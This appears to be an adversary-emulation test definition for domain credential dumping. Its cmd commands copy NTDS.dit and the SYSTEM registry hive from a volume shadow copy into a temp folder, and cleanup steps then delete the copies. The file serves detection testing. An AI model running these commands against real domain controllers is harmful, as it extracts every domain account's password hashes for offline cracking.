#TechniqueName: OS Credential Dumping: NTDS
#AtomicTestName: Copy NTDS.dit from Volume Shadow Copy
#Language: cmd

#get_prereq_commands
echo Sorry, Promoting this machine to a Domain Controller must be done manually


#prereq_commands
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT


#commands
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVE


#cleanup_commands
del "C:\Windows\Temp\ntds.dit"        >nul 2> nul
del "C:\Windows\Temp\VSC_SYSTEM_HIVE" >nul 2> nul
del "C:\Windows\Temp\SYSTEM_HIVE"     >nul 2> nul

